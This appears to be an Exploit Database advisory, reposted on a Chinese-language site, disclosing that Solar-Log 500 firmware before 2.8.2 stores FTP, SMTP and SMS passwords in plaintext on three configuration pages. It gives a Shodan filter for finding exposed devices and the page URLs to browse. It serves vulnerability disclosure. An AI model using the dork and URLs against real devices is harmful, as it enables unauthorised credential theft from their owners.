Solar-Log 500 2.8.2 – Unprotected Storage of Credentials

• Exploit Database
• 40 阅读

• 作者： Luca.Chiou
  日期： 2021-06-11
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49987/

• # Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
  # Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
  # Date: 2021-06-11
  # Exploit Author: Luca.Chiou
  # Vendor Homepage: https://www.solar-log.com/en/
  # Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
  # Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
  # Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
  
  # 1. Description:
  # An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013.
  # In /export.html, email.html, sms.html, the devices store plaintext passwords,
  # which may allow sensitive information to be read by someone with access to the device.
  
  # 2. Proof of Concept:
  # Browse the configuration page in Solar-Log 500,
  # we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext.
  # http://<Your Modem IP>/export.html
  # http://<Your Modem IP>/email.html
  # http://<Your Modem IP>/sms.html